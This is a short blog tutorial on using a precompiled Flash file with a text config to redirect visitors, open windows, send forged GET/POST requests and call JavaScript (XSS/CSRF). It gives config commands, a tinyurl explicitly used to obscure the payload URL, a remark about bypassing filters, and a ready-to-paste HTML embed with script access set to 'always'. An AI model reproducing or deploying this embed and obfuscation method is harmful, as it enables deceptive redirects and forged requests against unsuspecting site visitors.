Jump/XSS/CSRF in Flash

Hello everyone sorry for my absencebut i had lot stuff to do.

today i talk about Jump/XSS/CSRF in Flash.

The point of this tutorial is about build a redirect with flash jump

For the start we need to use a precompiled swf


we have to upload the swf file to a webserver i had used altervista.org for it

 fly image screen shot

 than we have to make a file txt with the same name of the swf like test.swf and test.txt

fly image screen shot

 now we have to edit the txt file

 fly image screen shot

this are example of the edit of file .txt

jump to http://drunkgeisha.noblogs.org

open window to http://drunkgeisha.noblogs.org

send GET Request to drunkgeisha.altervista.org

send POST Request to drunkgeisha.altervista.org

Call JavaScript

 fly image screen shot

now you have to try it 

for do it you need only to write in the browser


this string may be better for bypass some filter


if everythings is correct you can see this

 fly image screen shot


now you have to embed it on some page 

 i have used tinyurl for obscure better the url  http://tinyurl.com/yhh5x7l = http://drunkgeisha.altervista.org/prova.swf?sec80=http://drunkgeisha.altervista.org/prova.txt

<object width="425" height="344"><param name="movie" value="http://tinyurl.com/yhh5x7l"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://tinyurl.com/yhh5x7l" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object>

 the result is this 


and this on blogspot 

sorry for the bad quality but is my first tutorial video

This entry was posted in General. Bookmark the permalink.